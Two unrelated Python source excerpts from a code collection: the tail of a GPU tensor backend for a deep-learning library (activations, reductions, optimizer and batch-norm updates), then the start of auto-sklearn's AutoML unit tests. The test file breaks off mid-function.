slope (float): amount of gradient to apply when unit is not active
out (GPUTensor): Output tensor
"""
out[:] = self.ng.maximum(x, x*slope)
def rectleaky_derivative(self, x, slope, out):
"""
Leaky rectified linear nonlinearity derivative
Arguments:
x (GPUTensor): Input tensor
slope (float): amount of gradient to apply when unit is not active
out (GPUTensor): Output tensor
"""
out[:] = self.ng.greater(x, 0) * (1.0 - slope) + slope
def sum(self, tsr, axes, out):
"""
Sum
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.sum(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.sum(tsr, axis=axes, out=out)
return out
def norm(self, tsr, order=None, axis=None, out=None):
"""
Calculates and returns the vector p-norms of the GPUTensor along the
specified axis. The p-norm is defined on a vector A as
:math:`||A||_p = \sum_i(|A_i|^p)^{1/p}`.
Arguments:
tsr (GPUTensor): the GPUTensor on which to find the norms
order (int): The order or p upon which the norm is calculated.
Valid values include:
None, inf, -inf, 0, 1, -1, 2, -2, ...
axis (int): The axis along which to compute vector norms.
out (GPUTensor): where to write the results to. Must be
of the expected result shape.
Returns:
GPUTensor: p-norm of tsr along the specified axis.
Raises:
IndexError if invalid axis specified
AttributeError if invalid order specified
See Also:
`numpy.linalg.norm`
"""
if not isinstance(axis, int) or axis < 0 or axis >= len(tsr.shape):
raise IndexError("invalid axis value: %s", axis)
if not isinstance(order, (int, float)):
raise AttributeError("invalid order value: %s", order)
if out is None:
raise AttributeError("No output tensor speficied", order)
if order == float('Inf'):
self.ng.max(self.fabs(tsr), axis, out)
elif order == float('-Inf'):
self.ng.min(self.fabs(tsr), axis, out)
elif order == 0:
tmp = self.zeros(tsr.shape)
self.ng.not_equal(tsr, tmp, tmp)
self.ng.sum(tmp, axis, out)
else:
tmp = self.empty(tsr.shape)
self.ng.power(self.fabs(tsr), order, tmp)
self.ng.sum(tmp, axis, out)
self.ng.power(out, (1.0 / order), out)
return out
def mean(self, tsr, axes, out):
"""
Calculates the arithmetic mean of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.mean(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.mean(tsr, axis=axes, out=out)
return out
def min(self, tsr, axes, out):
"""
Calculates the minimum of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.min(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.min(tsr, axis=axes, out=out)
return out
def max(self, tsr, axes, out):
"""
Calculates the maximum of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.max(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.max(tsr, axis=axes, out=out)
return out
def variance(self, tsr, axes, out, mean=None):
"""
Calculates the variance of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): the tensor on which to compute the variance
axes (int, list, optional): the dimension(s) along which to
variance. If set to None, we will
variance over all dimensions.
out (GPUTensor): where the result will be stored.
mean (GPUTensor): the tensor containing mean of tsr
Returns:
GPUTensor: reference to out
"""
if mean is None:
logger.error("GPUTensor requires mean to be specified.")
raise ValueError("mean not specified")
self.ng.mean(self.ng.square(tsr-mean), axis=axes, out=out)
return out
def fabs(self, x, out):
"""
Calculates absolute value of the elements in a tensor
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
Returns:
GPUTensor: reference to out
"""
self.ng.fabs(x, out=out)
return out
def sqrt(self, x, out):
"""
Calculates square root of the elements in a tensor
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
Returns:
GPUTensor: reference to out
"""
self.ng.sqrt(x, out=out)
return out
def zeros(self, shape, dtype=default_dtype, persist_values=True):
"""
Allocate a new GPUTensor and fill it with zeros.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.zeros(shape, dtype=dtype)
def ones(self, shape, dtype=default_dtype, persist_values=True):
"""
Allocate a new GPUTensor and fill it with ones.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.ones(shape, dtype=dtype)
def zeros_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
"""
Instantiate a new instance of this backend's Tensor class, with the
shape taken from ary and populating each element with a value of 0.
Arguments:
ary (tensor object): Tensor to inherit the dimensions of.
dtype (data-type, optional): If present, specifies the underlying
type to employ for each element.
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
Tensor: array object
Raises:
NotImplementedError: Can't be instantiated directly.
See Also:
:py:func:`~neon.backends.backend.Backend.empty`,
:py:func:`~neon.backends.backend.Backend.ones`,
:py:func:`~neon.backends.backend.Backend.array`
"""
return self.zeros(ary.shape, dtype=dtype,
persist_values=persist_values)
def empty_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
"""
Instantiate a new instance of this backend's Tensor class, with the
shape taken from ary.
Arguments:
ary (tensor object): Tensor to inherit the dimensions of.
dtype (data-type, optional): If present, specifies the underlying
type to employ for each element.
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
Tensor: array object
Raises:
NotImplementedError: Can't be instantiated directly.
See Also:
:py:func:`~neon.backends.backend.Backend.empty`,
:py:func:`~neon.backends.backend.Backend.ones`,
:py:func:`~neon.backends.backend.Backend.array`
"""
return self.empty(ary.shape, dtype=dtype,
persist_values=persist_values, name=name)
def empty(self, shape, dtype=default_dtype, persist_values=True,
name=None):
"""
Allocate a new GPUTensor.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.empty(shape, dtype=dtype)
def copy(self, ary):
"""
returns a copy of ary
"""
res = self.empty_like(ary)
res.copy(ary)
return res
def array(self, ary, dtype=default_dtype, persist_values=True, name=None,
allocator=drv.mem_alloc):
"""
Allocate a new GPUTensor and fill it with supplied numpy array.
Arguments:
ary (ndarray): Numpy array with source data
dtype (dtype, optional): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
name (string): Name for the GPUTensor
allocator (pycuda): Pycuda memory allocator
Returns:
GPUTensor: output
"""
return self.ng.array(ary, dtype=dtype, name=name)
def add(self, left, right, out):
"""
Elementwise addition
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.add(left, right, out=out)
return out
def subtract(self, left, right, out):
"""
Elementwise subtraction
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.subtract(left, right, out=out)
return out
def multiply(self, left, right, out):
"""
Elementwise multiplication
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.multiply(left, right, out=out)
return out
def divide(self, left, right, out):
"""
Elementwise division
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.divide(left, right, out=out)
return out
def greater(self, left, right, out):
"""
Elementwise greater than testing
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.greater(left, right, out=out)
return out
def equal(self, left, right, out):
"""
Performs element-wise equality testing on each element of left and
right, storing the result in out. Each operand is assumed to be the
same shape (or broadcastable as such).
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.equal(left, right, out=out)
return out
def not_equal(self, left, right, out):
"""
Elementwise not equal testing
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.not_equal(left, right, out=out)
return out
def clip(self, a, a_min, a_max, out):
"""
Elementwise clipping between a range of specified values
Arguments:
a (GPUTensor): input tensor.
a_min (float): floor value.
a_max (float): ceiling value.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.clip(a, a_min, a_max, out=out)
return out
def log(self, a, out):
"""
Elementwise base-e logarithm
Arguments:
a (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.log(a, out=out)
return out
def tanh(self, a, out):
"""
Elementwise tanh
Arguments:
a (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.tanh(a, out=out)
return out
def argmax(self, a, out, axis=0):
"""
Calculates the indices of the maximal element value along the specified
axis. If multiple elements contain the maximum, only the elements of
the first are returned.
Arguments:
tsr (GPUTensor): The GPUTensor on which to find the maximum indices
axis (int): The dimension along which to find the maximum. If set
to None, find the overall maximum index of a flattened
representation of tsr.
out (GPUTensor): Where to store the result. Should be of the
appropriate type and expected shape
Returns:
GPUTensor: reference to out
"""
self.ng.argmax(a, out=out, axis=axis)
return out
def softmax(self, x, out):
"""
Softmax nonlinearity. Computes exp(x-max(x)) / sum_i exp(x_i-max(x_i))
Arguments:
x (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
out[:] = (self.ng.reciprocal(self.ng.sum(
self.ng.exp(x - self.ng.max(x, axis=0)), axis=0)) *
self.ng.exp(x - self.ng.max(x, axis=0)))
return out
def softmax_gradient(self, y, err, out):
"""
Gradient of the softmax nonlinearity.
Arguments:
y (GPUTensor): input tensor.
err (GPUTensor): backpropagated error.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
raise NotImplementedError("Softmax gradient should use shortcut")
return out
def make_binary_mask(self, tsr, keepthresh=0.5, dtype=default_dtype):
"""
Create a binary mask for dropout layers.
Arguments:
tsr (GPUTensor): Output tensor
keepthresh (float): fraction of ones
"""
self.ng.dropout(keep=keepthresh, out=tsr)
def gdm_compound(self, ps_item, us_item, vs_item, momentum_coef,
learning_rate, epoch):
"""
Perform gradient descent update with momentum.
Arguments:
ps_item (GPUTensor): parameter tensor (e.g. a weight matrix)
us_item (GPUTensor): update tensor, contains gradient wrt. weights
vs_item (GPUTensor): velocity tensor.
momentum_coef (float): momentum coefficient.
learning_rate (float): learning rate.
epoch (int): epoch (used in conjunction with diagnostics).
Outputs are written to vs_item (updated velocity)
and ps_item (updated weights)
"""
vs_item[:] = vs_item * momentum_coef - us_item * learning_rate
ps_item[:] = ps_item + vs_item
def gdmwd_compound(self, ps_item, us_item, vs_item, momentum_coef,
learning_rate, wd, epoch):
"""
Perform gradient descent update with momentum and weight decay.
Arguments:
ps_item (GPUTensor): parameter tensor (e.g. a weight matrix)
us_item (GPUTensor): update tensor, contains gradient wrt. weights
vs_item (GPUTensor): velocity tensor.
momentum_coef (float): momentum coefficient.
learning_rate (float): learning rate.
wd (float): weight decay parameter.
epoch (int): epoch (used in conjunction with diagnostics).
Outputs:
ps_item, the updated weights.
vs_item, the updated velocity.
us_item, used as a temp buffer.
"""
vs_item[:] = (vs_item * momentum_coef -
us_item * learning_rate -
ps_item * learning_rate * wd)
ps_item[:] = ps_item + vs_item
def exp_mavg(self, mavg, newval, rho):
"""
Calculate the exponential moving average
Arguments:
mavg: The running value of the moving average
newval: New sample to be added to the moving average
rho: Interpolation value
"""
mavg[:] = rho * mavg + (1.0 - rho) * newval
def ada_update(self, ps_item, us_item, gs_item, ds_item, ls_item, ss_item,
rho, epsilon):
"""
Update rule for AdaDelta (Zeiler, http://arxiv.org/abs/1212.5701)
Arguments:
ps_item: weight / parameter (will be updated)
us_item: update
gs_item: expected value of Gradient Squared (will be updated)
ds_item: expected value of Delta Squared (will be updated)
ls_item: learning rate (will be updated)
ss_item: Scratch Space
rho: decay constant (determines window size)
epsilon: small positive constant for numerical stability
"""
# Accumulate E[Grad^2]
gs_item[:] = gs_item * rho + (1.0 - rho) * us_item * us_item
# Calculate Updates
ls_item[:] = self.ng.sqrt((ds_item + epsilon) /
(gs_item + epsilon)) * (-1.0) * us_item
# Accumulate E[Delt^2]
ds_item[:] = ds_item * rho + (1.0 - rho) * ls_item * ls_item
# Final update to the params
ps_item[:] = ps_item + ls_item
def rms_update(self, params, updates, run_squares, velocity, scratch_space,
gamma, epsilon, learning_rate, momentum_coef):
# Update running squares
run_squares[:] = gamma * run_squares + (1. - gamma) * updates * updates
# Now scale the gradient by lr / rms(grad) (with a epsilon term for
# stability) and use it to update the params
if momentum_coef == 0:
params[:] = params - learning_rate * updates * self.ng.reciprocal(
self.ng.sqrt(run_squares) + epsilon)
else:
velocity[:] = velocity * momentum_coef - \
learning_rate * updates * \
self.ng.reciprocal(self.ng.sqrt(run_squares) + epsilon)
params[:] = params + velocity
def fprop_bn_compound(self, inputs, beta, gamma, eps, xhat,
xmean, xvar, gmean, gvar, rho, out):
"""
Batch normalization forward pass, compounded to run in 3 kernel calls.
Arguments:
inputs: input data to be normalized
beta: location parameter
gamma: scale parameter
eps: small constant for numerical stability
xvar: variance (updated)
xhat: normalized input (updated)
out: normalized and rescaled input (updated)
"""
xvar[:] = self.ng.var(inputs, axis=1)
xmean[:] = self.ng.mean(inputs, axis=1)
gmean[:] = gmean * rho + (1.0 - rho) * xmean
gvar[:] = gvar * rho + (1.0 - rho) * xvar
xvar[:] = self.ng.reciprocal(self.ng.sqrt(xvar + eps))
xhat[:] = xvar * (inputs - xmean)
out[:] = xhat * gamma + beta
return out
def bprop_bn_compound(self, xhat, error, xvar, gamma,
beta_updates, gamma_updates):
"""
Batch normalization backward pass, compounded to run with 4 kernel
calls.
Arguments:
xhat: normalized input data (updated)
error: backpropagated deltas (updated)
xvar: precomputed variance
gamma: scale parameter
beta_updates: gradient update for beta (updated)
gamma_updates: gradient update for gamma (updated)
"""
gamma_updates[:] = self.ng.sum(xhat * error, axis=1)
beta_updates[:] = self.ng.sum(error, axis=1)
xhat[:] = (xhat * gamma_updates + beta_updates) / float(xhat.shape[1])
error[:] = xvar * gamma * (error - xhat)
| 39.736842 | 79 | 0.556126 | 47,070 | 0.974131 | 0 | 0 | 0 | 0 | 0 | 0 | 33,903 | 0.701635 |
# ==== File: test/test_automl/test_automl.py | Repo: ihounie/auto-sklearn | License: BSD-3-Clause ====
# -*- encoding: utf-8 -*-
import os
import pickle
import sys
import time
import glob
import unittest
import unittest.mock
import numpy as np
import pandas as pd
import sklearn.datasets
from smac.scenario.scenario import Scenario
from smac.facade.roar_facade import ROAR
from autosklearn.util.backend import Backend
from autosklearn.automl import AutoML
import autosklearn.automl
from autosklearn.data.xy_data_manager import XYDataManager
from autosklearn.metrics import accuracy, log_loss, balanced_accuracy
import autosklearn.pipeline.util as putil
from autosklearn.util.logging_ import setup_logger, get_logger
from autosklearn.constants import MULTICLASS_CLASSIFICATION, BINARY_CLASSIFICATION, REGRESSION
from smac.tae.execute_ta_run import StatusType
sys.path.append(os.path.dirname(__file__))
from base import Base # noqa (E402: module level import not at top of file)
class AutoMLStub(AutoML):
def __init__(self):
self.__class__ = AutoML
self._task = None
class AutoMLTest(Base, unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
super().setUp()
self.automl = AutoMLStub()
self.automl._shared_mode = False
self.automl._seed = 42
self.automl._backend = unittest.mock.Mock(spec=Backend)
self.automl._delete_output_directories = lambda: 0
def test_refit_shuffle_on_fail(self):
backend_api = self._create_backend('test_refit_shuffle_on_fail')
failing_model = unittest.mock.Mock()
failing_model.fit.side_effect = [ValueError(), ValueError(), None]
failing_model.fit_transformer.side_effect = [
ValueError(), ValueError(), (None, {})]
failing_model.get_max_iter.return_value = 100
auto = AutoML(backend_api, 20, 5)
ensemble_mock = unittest.mock.Mock()
ensemble_mock.get_selected_model_identifiers.return_value = [(1, 1, 50.0)]
auto.ensemble_ = ensemble_mock
for budget_type in [None, 'iterations']:
auto._budget_type = budget_type
auto.models_ = {(1, 1, 50.0): failing_model}
# Make sure a valid 2D array is given to automl
X = np.array([1, 2, 3]).reshape(-1, 1)
y = np.array([1, 2, 3])
auto.refit(X, y)
self.assertEqual(failing_model.fit.call_count, 3)
self.assertEqual(failing_model.fit_transformer.call_count, 3)
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_only_loads_ensemble_models(self):
def side_effect(ids, *args, **kwargs):
return models if ids is identifiers else {}
# Add a resampling strategy as this is required by load_models
self.automl._resampling_strategy = 'holdout'
identifiers = [(1, 2), (3, 4)]
models = [42]
load_ensemble_mock = unittest.mock.Mock()
load_ensemble_mock.get_selected_model_identifiers.return_value = identifiers
self.automl._backend.load_ensemble.return_value = load_ensemble_mock
self.automl._backend.load_models_by_identifiers.side_effect = side_effect
self.automl._load_models()
self.assertEqual(models, self.automl.models_)
self.assertIsNone(self.automl.cv_models_)
self.automl._resampling_strategy = 'cv'
models = [42]
self.automl._backend.load_cv_models_by_identifiers.side_effect = side_effect
self.automl._load_models()
self.assertEqual(models, self.automl.cv_models_)
def test_check_for_models_if_no_ensemble(self):
models = [42]
self.automl._backend.load_ensemble.return_value = None
self.automl._backend.list_all_models.return_value = models
self.automl._disable_evaluator_output = False
self.automl._load_models()
def test_raises_if_no_models(self):
self.automl._backend.load_ensemble.return_value = None
self.automl._backend.list_all_models.return_value = []
self.automl._resampling_strategy = 'holdout'
self.automl._disable_evaluator_output = False
self.assertRaises(ValueError, self.automl._load_models)
self.automl._disable_evaluator_output = True
self.automl._load_models()
def test_fit(self):
backend_api = self._create_backend('test_fit')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.8)
self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_delete_non_candidate_models(self):
backend_api = self._create_backend(
'test_delete', delete_tmp_folder_after_terminate=False)
seed = 555
X, Y, _, _ = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend_api,
time_left_for_this_task=30,
per_run_time_limit=5,
ensemble_nbest=3,
seed=seed,
initial_configurations_via_metalearning=0,
resampling_strategy='holdout',
include_estimators=['sgd'],
include_preprocessors=['no_preprocessing'],
metric=accuracy,
)
automl.fit(X, Y, task=MULTICLASS_CLASSIFICATION,
X_test=X, y_test=Y)
# Assert at least one model file has been deleted and that there were no
# deletion errors
log_file_path = glob.glob(os.path.join(
backend_api.temporary_directory, 'AutoML(' + str(seed) + '):*.log'))
with open(log_file_path[0]) as log_file:
log_content = log_file.read()
self.assertIn('Deleted files of non-candidate model', log_content)
self.assertNotIn('Failed to delete files of non-candidate model', log_content)
self.assertNotIn('Failed to lock model', log_content)
# Assert that the files of the models used by the ensemble weren't deleted
model_files = backend_api.list_all_models(seed=seed)
model_files_idx = set()
for m_file in model_files:
# Extract the model identifiers from the filename
m_file = os.path.split(m_file)[1].replace('.model', '').split('.', 2)
model_files_idx.add((int(m_file[0]), int(m_file[1]), float(m_file[2])))
ensemble_members_idx = set(automl.ensemble_.identifiers_)
self.assertTrue(ensemble_members_idx.issubset(model_files_idx))
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fit_roar(self):
def get_roar_object_callback(
scenario_dict,
seed,
ta,
ta_kwargs,
**kwargs
):
"""Random online adaptive racing.
http://ml.informatik.uni-freiburg.de/papers/11-LION5-SMAC.pdf"""
scenario = Scenario(scenario_dict)
return ROAR(
scenario=scenario,
rng=seed,
tae_runner=ta,
tae_runner_kwargs=ta_kwargs,
)
backend_api = self._create_backend('test_fit_roar')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
initial_configurations_via_metalearning=0,
get_smac_object_callback=get_roar_object_callback,
metric=accuracy,
)
setup_logger()
automl._logger = get_logger('test_fit_roar')
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.8)
self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_binary_score_and_include(self):
"""
        Test the fix for binary classification prediction, which takes index 1 of the
        second dimension of the prediction matrix.
"""
backend_api = self._create_backend('test_binary_score_and_include')
data = sklearn.datasets.make_classification(
n_samples=400, n_features=10, n_redundant=1, n_informative=3,
n_repeated=1, n_clusters_per_class=2, random_state=1)
X_train = data[0][:200]
Y_train = data[1][:200]
X_test = data[0][200:]
Y_test = data[1][200:]
automl = autosklearn.automl.AutoML(
backend_api, 20, 5,
include_estimators=['sgd'],
include_preprocessors=['no_preprocessing'],
metric=accuracy,
)
automl.fit(X_train, Y_train, task=BINARY_CLASSIFICATION)
self.assertEqual(automl._task, BINARY_CLASSIFICATION)
# TODO, the assumption from above is not really tested here
        # Also, the score method should be removed, as it makes little sense here
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.4)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_automl_outputs(self):
backend_api = self._create_backend('test_automl_outputs')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
name = 'iris'
data_manager_file = os.path.join(
backend_api.temporary_directory,
'.auto-sklearn',
'datamanager.pkl'
)
auto = autosklearn.automl.AutoML(
backend_api, 20, 5,
initial_configurations_via_metalearning=0,
seed=100,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_automl_outputs')
auto.fit(
X=X_train,
y=Y_train,
X_test=X_test,
y_test=Y_test,
dataset_name=name,
task=MULTICLASS_CLASSIFICATION,
)
# pickled data manager (without one hot encoding!)
with open(data_manager_file, 'rb') as fh:
D = pickle.load(fh)
self.assertTrue(np.allclose(D.data['X_train'], X_train))
# Check that all directories are there
fixture = ['cv_models', 'true_targets_ensemble.npy',
'start_time_100', 'datamanager.pkl',
'predictions_ensemble',
'ensembles', 'predictions_test', 'models']
self.assertEqual(sorted(os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn'))),
sorted(fixture))
        # At least one ensemble, one validation, one test prediction and one model
fixture = os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn', 'predictions_ensemble'))
self.assertGreater(len(fixture), 0)
fixture = glob.glob(os.path.join(backend_api.temporary_directory, '.auto-sklearn',
'models', '100.*.model'))
self.assertGreater(len(fixture), 0)
fixture = os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn', 'ensembles'))
self.assertIn('100.0000000001.ensemble', fixture)
# Start time
start_time_file_path = os.path.join(backend_api.temporary_directory,
'.auto-sklearn', "start_time_100")
with open(start_time_file_path, 'r') as fh:
start_time = float(fh.read())
self.assertGreaterEqual(time.time() - start_time, 10)
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_do_dummy_prediction(self):
datasets = {
'breast_cancer': BINARY_CLASSIFICATION,
'wine': MULTICLASS_CLASSIFICATION,
'diabetes': REGRESSION,
}
for name, task in datasets.items():
backend_api = self._create_backend('test_do_dummy_prediction')
X_train, Y_train, X_test, Y_test = putil.get_dataset(name)
datamanager = XYDataManager(
X_train, Y_train,
X_test, Y_test,
task=task,
dataset_name=name,
feat_type=None,
)
auto = autosklearn.automl.AutoML(
backend_api, 20, 5,
initial_configurations_via_metalearning=25,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_do_dummy_predictions')
auto._backend.save_datamanager(datamanager)
D = backend_api.load_datamanager()
            # Check if the data manager is correctly loaded
self.assertEqual(D.info['task'], datamanager.info['task'])
auto._do_dummy_prediction(D, 1)
# Ensure that the dummy predictions are not in the current working
# directory, but in the temporary directory.
self.assertFalse(os.path.exists(os.path.join(os.getcwd(),
'.auto-sklearn')))
self.assertTrue(os.path.exists(os.path.join(
backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble',
'predictions_ensemble_1_1_0.0.npy')))
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
@unittest.mock.patch('autosklearn.evaluation.ExecuteTaFuncWithQueue.run')
def test_fail_if_dummy_prediction_fails(self, ta_run_mock):
backend_api = self._create_backend('test_fail_if_dummy_prediction_fails')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
datamanager = XYDataManager(
X_train, Y_train,
X_test, Y_test,
task=2,
feat_type=['Numerical' for i in range(X_train.shape[1])],
dataset_name='iris',
)
time_for_this_task = 30
per_run_time = 10
auto = autosklearn.automl.AutoML(backend_api,
time_for_this_task,
per_run_time,
initial_configurations_via_metalearning=25,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_fail_if_dummy_prediction_fails')
auto._backend._make_internals_directory()
auto._backend.save_datamanager(datamanager)
# First of all, check that ta.run() is actually called.
ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test"
auto._do_dummy_prediction(datamanager, 1)
ta_run_mock.assert_called_once_with(1, cutoff=time_for_this_task)
# Case 1. Check that function raises no error when statustype == success.
# ta.run() returns status, cost, runtime, and additional info.
ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test"
raised = False
try:
auto._do_dummy_prediction(datamanager, 1)
except ValueError:
raised = True
self.assertFalse(raised, 'Exception raised')
# Case 2. Check that if statustype returned by ta.run() != success,
# the function raises error.
ta_run_mock.return_value = StatusType.CRASHED, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.CRASHED '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.ABORT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.ABORT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.TIMEOUT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.TIMEOUT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.MEMOUT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.MEMOUT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.CAPPED, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.CAPPED '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
@unittest.mock.patch('autosklearn.smbo.AutoMLSMBO.run_smbo')
def test_exceptions_inside_log_in_smbo(self, smbo_run_mock):
# Make sure that any exception during the AutoML fit due to
# SMAC are properly captured in a log file
backend_api = self._create_backend('test_exceptions_inside_log')
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
automl = autosklearn.automl.AutoML(
backend_api,
20,
5,
metric=accuracy,
)
output_file = 'test_exceptions_inside_log.log'
setup_logger(output_file=output_file)
logger = get_logger('test_exceptions_inside_log')
        # Create a custom exception to prevent other errors from slipping in
class MyException(Exception):
pass
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
# The first call is on dummy predictor failure
message = str(np.random.randint(100)) + '_run_smbo'
smbo_run_mock.side_effect = MyException(message)
with unittest.mock.patch('autosklearn.automl.AutoML._get_logger') as mock:
mock.return_value = logger
with self.assertRaises(MyException):
automl.fit(
X_train,
Y_train,
task=MULTICLASS_CLASSIFICATION,
)
with open(output_file) as f:
self.assertTrue(message in f.read())
# Cleanup
os.unlink(output_file)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_load_best_individual_model(self):
backend_api = self._create_backend('test_fit')
for metric in [log_loss, balanced_accuracy]:
